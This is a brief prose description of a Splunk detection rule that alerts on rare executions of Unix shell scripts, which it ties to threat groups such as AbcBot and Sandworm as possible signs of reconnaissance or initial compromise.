This detection rule identifies rare executions of Unix shell scripts (.sh) in the context of potential malicious activities. Given that shell scripts enable various command executions, the detection focuses on identifying patterns where such scripts are invoked unusually. The logic utilizes the Splunk framework to query Unix syscall logs specifically pertaining to shell scripts execution, filtering for instances where the frequency of the commands executed is low (less than five), indicating potentially abnormal behavior. Additionally, it monitors the command names to specifically pick out those with a .sh extension, which correlate with the discussed threat actor associations, including groups like AbcBot and Sandworm. The rule is intended to bolster defenses against evolving scripting-based attack vectors by providing an alert mechanism for unusual script executions which may be indicative of reconnaissance or initial compromise activities.